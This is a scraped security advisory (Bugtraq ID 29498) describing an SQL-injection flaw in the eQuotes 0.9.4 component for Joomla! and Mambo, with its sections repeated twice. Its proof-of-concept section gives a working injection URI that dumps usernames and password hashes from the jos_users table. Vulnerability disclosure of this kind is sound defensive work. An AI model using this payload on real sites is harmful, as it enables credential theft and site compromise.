Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
BID:29498
Info
Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
| Bugtraq ID: | 29498 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 02 2008 12:00AM |
| Updated: | Jun 02 2008 12:00AM |
| Credit: | His0k4 |
| Vulnerable: |
CommunityGrove eQuotes 0.9.4 |
| Not Vulnerable: | |
Discussion
Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
The eQuotes ('com_equotes') component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects eQuotes 0.9.4; other versions may also be vulnerable.
The eQuotes ('com_equotes') component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects eQuotes 0.9.4; other versions may also be vulnerable.
Exploit / POC
Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
Solution / Fix
Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! and Mambo eQuotes Component SQL Injection Vulnerability
References:
References:
- eQuotes Homepage (CommunityGrove)
- Joomla! Homepage (Joomla!)
- Mambo Homepage (Mambo)